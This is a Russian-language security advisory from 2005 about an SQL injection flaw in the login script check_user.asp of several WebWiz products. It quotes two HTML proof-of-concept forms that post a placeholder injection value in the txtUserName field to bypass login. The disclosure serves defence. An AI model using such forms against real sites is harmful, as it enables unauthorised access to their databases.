Security Lab

SQL-инъекция в продуктах WebWiz

Дата публикации:31.12.2005
Всего просмотров:3299
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии:
webwiz site news access2000 : vesion 3.06 и более ранние версии
webwiz journal access2000 : version 1.0
webwiz weekly poll access2000 : version 3.06 и более ранние версии
database login access2000 : version 1.71 и более ранние версии
webwiz site news access97 : version 3.06 и более ранние версии
webwiz journal access97 : version 1.0
webwiz weekly poll access97 : version 3.06 и более ранние версии
database login access97 : version 1.71 и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует при обработке входных данных в параметре 'txtUserName' в сценарии "check_user.asp". Удаленный пользователь может послать специально сформированный HTTP POST запрос и выполнить произвольные SQL команды в базе данных приложения. Пример:

<html>
< h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
< p> Discovery and exploit by devil_box [at} kapda.ir</p>
< p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
< form method="POST" action="http://target/[product]/check_user.asp">
< input type="hidden" name="txtUserName" value="[SQL INJECTION]">
< input type="hidden" name="txtUserPass" value="1">
< input type="submit" value="Submit" name="submit">
< /form></html>

<html>
< h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
< p> Discovery and exploit by devil_box [at} kapda.ir</p>
< p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
< form method="POST" action="http://target/[product]/check_user.asp">
< input type="hidden" name="txtUserName" value="[SQL INJECTION]">
< input type="hidden" name="txtUserPass" value="1">
< input type="submit" value="Submit" name="submit">
< /form></html>

URL производителя: www.webwizguide.info

Решение: Способов устранения уязвимости не существует в настоящее время.

Источник:

Ссылки: WebWiz Products SQL Injection